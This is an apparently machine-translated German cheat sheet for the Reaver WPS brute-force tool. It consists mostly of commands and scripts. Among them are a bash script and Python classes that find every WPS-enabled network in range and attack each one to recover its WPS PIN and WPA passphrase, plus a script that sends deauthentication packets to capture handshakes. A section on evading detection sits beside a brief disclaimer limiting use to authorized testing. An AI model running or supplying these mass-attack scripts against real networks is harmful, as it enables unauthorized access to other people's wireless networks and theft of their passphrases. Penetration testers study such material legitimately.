Reaver Cheat Blatt¶
Überblick¶
Reaver ist ein spezialisiertes drahtloses Sicherheitstool, das entwickelt wurde, um Schwachstellen in Wi-Fi Protected Setup (WPS) Implementierungen zu nutzen, um WPA/WPA2 Passphrasen zurückzugewinnen. Entwickelt von Craig Heffner, Reaver implementiert einen brutalen Kraftangriff gegen WPS PIN-Authentifizierung, unter Ausnutzung eines kritischen Designfehlers im WPS-Protokoll, das Angreifern ermöglicht, die PIN in deutlich weniger Versuchen als das theoretische Maximum wiederherzustellen. Diese Schwachstelle, bekannt als WPS PIN-Angriff, betrifft Millionen von drahtlosen Routern und Access Points weltweit.
Die grundlegende Schwäche, die Reaver ausnutzt, liegt darin, wie WPS die PIN-Authentifizierung validiert. Anstatt die gesamte 8-stellige PIN als Einheit zu validieren, validiert WPS die PIN in zwei getrennten Hälften, wodurch der Suchraum von 10^8 möglichen Kombinationen auf etwa 11.000 Versuche effektiv reduziert wird. Diese Konstruktionsfehler, kombiniert mit der Tatsache, dass die meisten WPS-Implementierungen keine ordnungsgemäßen Geschwindigkeitsbegrenzungs- oder Sperrmechanismen implementieren, ermöglicht es, WPS PINs und anschließend die WPA/WPA2-Passphrase in einer Angelegenheit von Stunden wiederherzustellen.
Reaver ist zu einem unverzichtbaren Werkzeug für drahtlose Sicherheitsbewertungen und Penetrationstests geworden, das die inhärenten Sicherheitsschwächen bei WPS-Implementierungen zeigt. Die Wirksamkeit des Tools hat zu einem weit verbreiteten Bewusstsein für WPS-Schwachstellen geführt und hat viele Organisationen beeinflusst, um die WPS-Funktionalität auf ihrer drahtlosen Infrastruktur zu deaktivieren. Trotz der von einigen Herstellern durchgeführten Gegenmaßnahmen bleibt Reaver für die Prüfung von Altsystemen und die Identifizierung von gefährdeten drahtlosen Netzwerken während der Sicherheitsbewertungen von Bedeutung.
Installation¶
Installation des Paketmanagers¶
Installieren von Reaver durch Systempaketmanager:
```bash
Ubuntu/Debian installation¶
sudo apt update sudo apt install reaver
Kali Linux (pre-installed)¶
reaver --help
CentOS/RHEL installation¶
sudo yum install epel-release sudo yum install reaver
Arch Linux installation¶
sudo pacman -S reaver
Verify installation¶
reaver --version which reaver ```_
Quelle Compilation¶
Compiling Reaver aus Quellcode:
```bash
Install dependencies¶
sudo apt install build-essential libpcap-dev sqlite3 libsqlite3-dev
Clone repository¶
git clone https://github.com/t6x/reaver-wps-fork-t6x.git cd reaver-wps-fork-t6x
Navigate to source directory¶
cd src
Configure and compile¶
./configure make
Install system-wide¶
sudo make install
Verify installation¶
reaver --version ```_
Docker Installation¶
```bash
Create Dockerfile for Reaver¶
cat > Dockerfile << 'EOF' FROM kalilinux/kali-rolling RUN apt-get update && apt-get install -y reaver aircrack-ng WORKDIR /workspace CMD ["/bin/bash"] EOF
Build container¶
docker build -t reaver-toolkit .
Run with network access¶
docker run -it --net=host --privileged reaver-toolkit
Mount workspace¶
docker run -it --net=host --privileged -v $(pwd):/workspace reaver-toolkit ```_
Basisnutzung¶
Zielentdeckung¶
Entdecken von WPS-fähigen Access Points:
```bash
Put wireless interface in monitor mode¶
sudo airmon-ng start wlan0
Scan for WPS-enabled networks¶
wash -i wlan0mon
Detailed WPS scan¶
wash -i wlan0mon -C
Scan specific channel¶
wash -i wlan0mon -c 6
Save scan results¶
wash -i wlan0mon -o wps_targets.txt
Show only networks with WPS enabled¶
wash -i wlan0mon|grep "Yes" ```_
Grundlegende WPS Angriff¶
Durchführung grundlegender WPS PIN brutaler Gewaltangriff:
```bash
Basic Reaver attack¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
Attack with specific channel¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv
Attack with delay between attempts¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 1 -vv
Attack with session file¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
Resume previous session¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv ```_
Erweiterte Angriffsoptionen¶
Erweiterte Reaver-Angriffskonfigurationen:
```bash
Ignore lock warnings¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
No NACKS (for some routers)¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -vv
Disable associated requests¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -A -vv
Use small DH keys¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -S -vv
Specify timeout¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 1 -vv ```_
Erweiterte Funktionen¶
PIN Management¶
Verwalten von WPS PIN Versuchen und Erholung:
```bash
Start from specific PIN¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -vv
Use PIN from file¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -P pin_list.txt -vv
Generate PIN list¶
crunch 8 8 0123456789 > pin_list.txt
Check specific PIN¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -1 -vv
Show current PIN attempt¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv|grep "Trying pin" ```_
Sitzungsmanagement¶
Verwaltung von Reaver-Angriffssitzungen:
```bash
Create named session¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -s target1.wpc -vv
List existing sessions¶
ls ~/.reaver/
View session details¶
sqlite3 ~/.reaver/target1.wpc "SELECT * FROM status;"
Delete session¶
rm ~/.reaver/target1.wpc
Backup session¶
cp ~/.reaver/target1.wpc target1_backup.wpc ```_
Grenzwerte und Timing¶
Steuerung des Angriffszeitpunkts und der Geschwindigkeitsbegrenzung:
```bash
Delay between PIN attempts (seconds)¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 5 -vv
Delay after 10 failures¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -r 10:60 -vv
Maximum number of attempts¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -g 100 -vv
Timeout for each attempt¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 5 -vv
Recurring delay pattern¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -R 3 -vv ```_
Pixie Dust Attack¶
Durchführung Pixie Dust (offline) Angriff:
```bash
Enable Pixie Dust attack¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv
Pixie Dust with specific parameters¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1 -vv
Save Pixie Dust data¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -O pixie_data.txt -vv
Use external Pixie Dust tool¶
pixiewps -e pke -r pkr -s hash1 -z hash2 -a authkey -n e-nonce
Automated Pixie Dust with OneShot¶
python3 oneshot.py -i wlan0mon -b 00:11:22:33:44:55 -K ```_
Automatisierungsskripte¶
Maß WPS Testing¶
```bash
!/bin/bash¶
Mass WPS testing script¶
INTERFACE="wlan0mon" RESULTS_DIR="reaver_results" DELAY=2
mkdir -p $RESULTS_DIR
echo "Starting mass WPS testing"
Discover WPS targets¶
echo "Discovering WPS-enabled targets..." wash -i $INTERFACE -C > $RESULTS_DIR/wps_targets.txt
Extract target information¶
grep "Yes" \(RESULTS_DIR/wps_targets.txt|while read line; do BSSID=\)(echo $line|awk '\\{print \(1\\\\}') CHANNEL=\)(echo $line|awk '\\{print \(2\\\\}') ESSID=\)(echo $line|awk '\\{print $6\\}')
echo "Testing target: $ESSID ($BSSID) on channel $CHANNEL"
# Create target-specific log
LOG_FILE="$RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.log"
SESSION_FILE="$RESULTS_DIR/session_$\\\\{BSSID//:/_\\\\}.wpc"
# Try Pixie Dust attack first
echo "Attempting Pixie Dust attack on $BSSID"
timeout 300 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -K -vv -s $SESSION_FILE > $LOG_FILE 2>&1
# Check if Pixie Dust was successful
if grep -q "WPS PIN:" $LOG_FILE; then
echo "SUCCESS: Pixie Dust attack successful for $BSSID"
grep "WPS PIN:\|WPA PSK:" $LOG_FILE >> $RESULTS_DIR/successful_attacks.txt
continue
fi
# If Pixie Dust failed, try regular brute force
echo "Pixie Dust failed, attempting brute force on $BSSID"
timeout 3600 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -d $DELAY -vv -s $SESSION_FILE >> $LOG_FILE 2>&1 &
# Store PID for later management
echo $! > $RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.pid
sleep 10 # Brief delay between targets
done
echo "Mass WPS testing initiated. Check $RESULTS_DIR for results." ```_
Automatisierte PIN Erholung¶
```python
!/usr/bin/env python3¶
Automated WPS PIN recovery script¶
import subprocess import re import time import json from datetime import datetime
class ReaverAutomation: def init(self, interface): self.interface = interface self.results = \\{\\} self.active_attacks = \\{\\}
def discover_targets(self):
"""Discover WPS-enabled targets"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
targets = []
for line in result.stdout.split('\n'):
if 'Yes' in line: # WPS enabled
parts = line.split()
if len(parts) >= 6:
target = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'essid': ' '.join(parts[5:])
\\\\}
targets.append(target)
return targets
except Exception as e:
print(f"Error discovering targets: \\\\{e\\\\}")
return []
def pixie_dust_attack(self, target):
"""Attempt Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
# Parse output for PIN and PSK
pin_match = re.search(r'WPS PIN: (\d+)', result.stdout)
psk_match = re.search(r'WPA PSK: (.+)', result.stdout)
if pin_match and psk_match:
return \\\\{
'success': True,
'method': 'pixie_dust',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
else:
return \\\\{'success': False, 'method': 'pixie_dust'\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': str(e)\\\\}
def brute_force_attack(self, target, max_time=3600):
"""Attempt brute force attack"""
session_file = f"session_\\\\{target['bssid'].replace(':', '_')\\\\}.wpc"
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-d", "2", # 2 second delay
"-s", session_file,
"-vv"
]
try:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
start_time = time.time()
while True:
if time.time() - start_time > max_time:
process.terminate()
return \\\\{'success': False, 'method': 'brute_force', 'error': 'timeout'\\\\}
line = process.stdout.readline()
if not line:
break
# Check for successful PIN recovery
pin_match = re.search(r'WPS PIN: (\d+)', line)
psk_match = re.search(r'WPA PSK: (.+)', line)
if pin_match and psk_match:
process.terminate()
return \\\\{
'success': True,
'method': 'brute_force',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
# Check for rate limiting
if 'rate limiting' in line.lower():
print(f"Rate limiting detected for \\\\{target['bssid']\\\\}")
time.sleep(60) # Wait before continuing
process.terminate()
return \\\\{'success': False, 'method': 'brute_force'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'brute_force', 'error': str(e)\\\\}
def attack_target(self, target):
"""Attack single target with multiple methods"""
print(f"Attacking \\\\{target['essid']\\\\} (\\\\{target['bssid']\\\\})")
# Try Pixie Dust first
result = self.pixie_dust_attack(target)
if result['success']:
print(f"SUCCESS: Pixie Dust attack successful for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
# If Pixie Dust failed, try brute force
print(f"Pixie Dust failed, attempting brute force for \\\\{target['bssid']\\\\}")
result = self.brute_force_attack(target)
if result['success']:
print(f"SUCCESS: Brute force attack successful for \\\\{target['bssid']\\\\}")
else:
print(f"FAILED: All attacks failed for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
def run_mass_attack(self):
"""Run attacks against all discovered targets"""
targets = self.discover_targets()
if not targets:
print("No WPS-enabled targets found")
return
print(f"Found \\\\{len(targets)\\\\} WPS-enabled targets")
for target in targets:
self.attack_target(target)
time.sleep(5) # Brief delay between targets
self.generate_report()
def generate_report(self):
"""Generate attack results report"""
report = \\\\{
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'total_targets': len(self.results),
'successful_attacks': len([r for r in self.results.values() if r['success']]),
'results': self.results
\\\\}
with open('reaver_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"Report saved to reaver_report.json")
print(f"Successful attacks: \\\\{report['successful_attacks']\\\\}/\\\\{report['total_targets']\\\\}")
Usage¶
if name == "main": automation = ReaverAutomation("wlan0mon") automation.run_mass_attack() ```_
WPS Vulnerability Scanner¶
```python
!/usr/bin/env python3¶
WPS vulnerability scanner¶
import subprocess import re import csv from datetime import datetime
class WPSScanner: def init(self, interface): self.interface = interface self.vulnerabilities = []
def scan_wps_networks(self):
"""Scan for WPS-enabled networks"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
networks = []
for line in result.stdout.split('\n'):
if line.strip() and not line.startswith('BSSID'):
parts = line.split()
if len(parts) >= 5:
network = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'wps_enabled': 'Yes' in line,
'essid': ' '.join(parts[5:]) if len(parts) > 5 else 'Hidden'
\\\\}
networks.append(network)
return networks
except Exception as e:
print(f"Error scanning networks: \\\\{e\\\\}")
return []
def test_pixie_dust_vulnerability(self, network):
"""Test if network is vulnerable to Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", network['bssid'],
"-c", network['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
# Check for Pixie Dust vulnerability indicators
if 'WPS PIN:' in result.stdout:
return 'vulnerable'
elif 'Pixie Dust attack failed' in result.stdout:
return 'not_vulnerable'
elif 'timeout' in result.stderr.lower():
return 'timeout'
else:
return 'unknown'
except subprocess.TimeoutExpired:
return 'timeout'
except Exception as e:
return 'error'
def assess_wps_security(self, network):
"""Assess WPS security configuration"""
vulnerabilities = []
# Check if WPS is enabled
if network['wps_enabled']:
vulnerabilities.append('WPS_ENABLED')
# Check if WPS is locked
if network['wps_locked'] == 'No':
vulnerabilities.append('WPS_NOT_LOCKED')
# Check WPS version
if network['wps_version'] in ['1.0', '2.0']:
vulnerabilities.append('VULNERABLE_WPS_VERSION')
# Test Pixie Dust vulnerability
pixie_result = self.test_pixie_dust_vulnerability(network)
if pixie_result == 'vulnerable':
vulnerabilities.append('PIXIE_DUST_VULNERABLE')
return vulnerabilities
def generate_vulnerability_report(self, networks):
"""Generate comprehensive vulnerability report"""
report_data = []
for network in networks:
if network['wps_enabled']:
vulns = self.assess_wps_security(network)
report_entry = \\\\{
'timestamp': datetime.now().isoformat(),
'bssid': network['bssid'],
'essid': network['essid'],
'channel': network['channel'],
'rssi': network['rssi'],
'wps_version': network['wps_version'],
'wps_locked': network['wps_locked'],
'vulnerabilities': ','.join(vulns),
'risk_level': self.calculate_risk_level(vulns)
\\\\}
report_data.append(report_entry)
self.vulnerabilities.extend(vulns)
# Save to CSV
with open('wps_vulnerability_report.csv', 'w', newline='') as csvfile:
fieldnames = ['timestamp', 'bssid', 'essid', 'channel', 'rssi',
'wps_version', 'wps_locked', 'vulnerabilities', 'risk_level']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for entry in report_data:
writer.writerow(entry)
return report_data
def calculate_risk_level(self, vulnerabilities):
"""Calculate risk level based on vulnerabilities"""
if 'PIXIE_DUST_VULNERABLE' in vulnerabilities:
return 'CRITICAL'
elif 'WPS_NOT_LOCKED' in vulnerabilities and 'WPS_ENABLED' in vulnerabilities:
return 'HIGH'
elif 'WPS_ENABLED' in vulnerabilities:
return 'MEDIUM'
else:
return 'LOW'
def run_assessment(self):
"""Run complete WPS security assessment"""
print("Starting WPS vulnerability assessment...")
networks = self.scan_wps_networks()
print(f"Found \\\\{len(networks)\\\\} networks")
wps_networks = [n for n in networks if n['wps_enabled']]
print(f"Found \\\\{len(wps_networks)\\\\} WPS-enabled networks")
if wps_networks:
report = self.generate_vulnerability_report(wps_networks)
# Summary statistics
critical = len([r for r in report if r['risk_level'] == 'CRITICAL'])
high = len([r for r in report if r['risk_level'] == 'HIGH'])
medium = len([r for r in report if r['risk_level'] == 'MEDIUM'])
print(f"\nVulnerability Summary:")
print(f"Critical: \\\\{critical\\\\}")
print(f"High: \\\\{high\\\\}")
print(f"Medium: \\\\{medium\\\\}")
print(f"Report saved to wps_vulnerability_report.csv")
else:
print("No WPS-enabled networks found")
Usage¶
if name == "main": scanner = WPSScanner("wlan0mon") scanner.run_assessment() ```_
Integrationsbeispiele¶
Integration von Aircracks¶
```bash
!/bin/bash¶
Reaver and Aircrack-ng integration¶
INTERFACE="wlan0mon" TARGET_BSSID="00:11:22:33:44:55" TARGET_CHANNEL="6"
echo "Starting integrated WPS/WPA attack"
Start airodump-ng to capture handshakes¶
airodump-ng -c $TARGET_CHANNEL -w capture --bssid $TARGET_BSSID \(INTERFACE & AIRODUMP_PID=\)!
Start Reaver attack¶
reaver -i $INTERFACE -b $TARGET_BSSID -c \(TARGET_CHANNEL -vv & REAVER_PID=\)!
Monitor for successful WPS crack¶
while kill -0 $REAVER_PID 2>/dev/null; do if grep -q "WPS PIN:" reaver.log 2>/dev/null; then echo "WPS PIN recovered!" kill $REAVER_PID break fi sleep 10 done
If WPS failed, try WPA handshake capture¶
if ! grep -q "WPS PIN:" reaver.log 2>/dev/null; then echo "WPS attack failed, attempting handshake capture"
# Send deauth packets to force handshake
aireplay-ng -0 5 -a $TARGET_BSSID $INTERFACE
# Wait for handshake
sleep 30
# Stop airodump-ng
kill $AIRODUMP_PID
# Check for captured handshake
if aircrack-ng -w wordlist.txt capture-01.cap; then
echo "WPA passphrase recovered via handshake attack"
fi
fi
echo "Attack completed" ```_
Kismet Integration¶
```python
!/usr/bin/env python3¶
Reaver and Kismet integration¶
import subprocess import json import time
class ReaverKismetIntegration: def init(self, kismet_server="localhost:2501"): self.kismet_server = kismet_server self.wps_targets = []
def get_kismet_devices(self):
"""Get device list from Kismet"""
cmd = [
"curl",
"-s",
f"http://\\\\{self.kismet_server\\\\}/devices/views/all/devices.json"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True)
devices = json.loads(result.stdout)
wps_devices = []
for device in devices:
if 'dot11.device' in device:
dot11 = device['dot11.device']
if 'dot11.device.wps_config_methods' in dot11:
wps_devices.append(\\\\{
'bssid': device['kismet.device.base.macaddr'],
'ssid': dot11.get('dot11.device.last_beaconed_ssid', 'Hidden'),
'channel': dot11.get('dot11.device.channel', 'Unknown'),
'signal': device.get('kismet.device.base.signal', \\\\{\\\\}).get('kismet.common.signal.last_signal', 0)
\\\\})
return wps_devices
except Exception as e:
print(f"Error getting Kismet devices: \\\\{e\\\\}")
return []
def prioritize_targets(self, devices):
"""Prioritize targets based on signal strength and other factors"""
# Sort by signal strength (higher is better)
sorted_devices = sorted(devices, key=lambda x: x['signal'], reverse=True)
# Filter out weak signals
strong_devices = [d for d in sorted_devices if d['signal'] > -70]
return strong_devices
def attack_target(self, target, interface="wlan0mon"):
"""Attack target with Reaver"""
cmd = [
"reaver",
"-i", interface,
"-b", target['bssid'],
"-c", str(target['channel']),
"-K", # Try Pixie Dust first
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'pixie_dust',
'output': result.stdout
\\\\}
else:
# Try brute force if Pixie Dust fails
cmd[cmd.index('-K')] = '-d'
cmd.insert(cmd.index('-d') + 1, '2')
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'brute_force',
'output': result.stdout
\\\\}
else:
return \\\\{'success': False, 'output': result.stdout\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'error': str(e)\\\\}
def run_integrated_attack(self, interface="wlan0mon"):
"""Run integrated Kismet + Reaver attack"""
print("Getting WPS targets from Kismet...")
devices = self.get_kismet_devices()
if not devices:
print("No WPS devices found in Kismet")
return
print(f"Found \\\\{len(devices)\\\\} WPS-enabled devices")
# Prioritize targets
targets = self.prioritize_targets(devices)
print(f"Attacking \\\\{len(targets)\\\\} prioritized targets")
for target in targets:
print(f"Attacking \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\})")
result = self.attack_target(target, interface)
if result['success']:
print(f"SUCCESS: \\\\{target['ssid']\\\\} cracked via \\\\{result['method']\\\\}")
# Log successful attack
with open('successful_attacks.log', 'a') as f:
f.write(f"\\\\{time.ctime()\\\\}: \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\}) - \\\\{result['method']\\\\}\n")
else:
print(f"FAILED: \\\\{target['ssid']\\\\} attack unsuccessful")
time.sleep(5) # Brief delay between attacks
Usage¶
if name == "main": integration = ReaverKismetIntegration() integration.run_integrated_attack("wlan0mon") ```_
Fehlerbehebung¶
Gemeinsame Themen¶
Interface Probleme: ```bash
Check wireless interface¶
iwconfig
Put interface in monitor mode¶
sudo airmon-ng start wlan0
Check monitor mode interface¶
iwconfig wlan0mon
Kill conflicting processes¶
sudo airmon-ng check kill
Restart network manager¶
sudo systemctl restart NetworkManager ```_
WPS Lock Issues: ```bash
Check if WPS is locked¶
wash -i wlan0mon|grep "Yes.*Yes"
Wait for lock timeout¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
Use longer delays¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 60 -vv
Try different attack methods¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -A -vv ```_
Verbandsprobleme: ```bash
Check signal strength¶
wash -i wlan0mon|grep BSSID
Move closer to target¶
Increase transmission power (if legal)¶
sudo iwconfig wlan0mon txpower 20
Use external antenna¶
Check for interference¶
airodump-ng wlan0mon ```_
Debugging¶
Debugging und Protokollierung aktivieren:
```bash
Maximum verbosity¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
Log to file¶
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv 2>&1|tee reaver.log
Monitor system logs¶
tail -f /var/log/syslog|grep reaver
Check wireless driver logs¶
dmesg|grep -i wireless
Monitor network traffic¶
tcpdump -i wlan0mon -w reaver_traffic.pcap ```_
Sicherheitsüberlegungen¶
Rechtliche und ethische Überlegungen¶
Authorized Testing Only: - Nur Testnetzwerke, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - schriftliche Genehmigung vor der Durchführung von WPS-Angriffen erhalten - Folgen Sie den lokalen Gesetzen und Vorschriften zur drahtlosen Sicherheitsprüfung - Respektieren Sie Privatsphäre und Vertraulichkeit des Netzwerkverkehrs - Dokumentation aller Prüftätigkeiten für die Einhaltung
**Verantwortliche Angaben: ** - Melden Sie Schwachstellen an Netzbetreibern - Bereitstellung von Abhilfeberatung - Erlauben Sie angemessene Zeit für Fixes - koordinierte Offenlegungsverfahren - Vertraulichkeit während des Offenlegungsprozesses
Operationelle Sicherheit¶
** Nachweisvermeidung:** - Verwenden Sie geeignete Verzögerungen zwischen Versuchen - Monitor für defensive Antworten - Vermeiden Sie Spitzenzeiten - Verwenden Sie Richtantennen, wenn möglich - Durchführung richtiger operativer Sicherheitsmaßnahmen
** Auswirkungen auf das Netz:** - Minimieren Sie die Störung der legitimen Nutzer - Vermeiden Sie übermäßige Deauthentikalangriffe - Überwachen Sie die Auswirkungen der Netzwerkleistung - geeignete Leistungsstufen verwenden - Anforderungen an die Netzverfügbarkeit
Referenzen¶
- Reaver GitHub Repository
- [WPS Protokoll Spezifikation](LINK_5_
- [WPS Sicherheitslücken](LINK_5
- (LINK_5)
- [IEEE 802.11 Standards](LINK_5_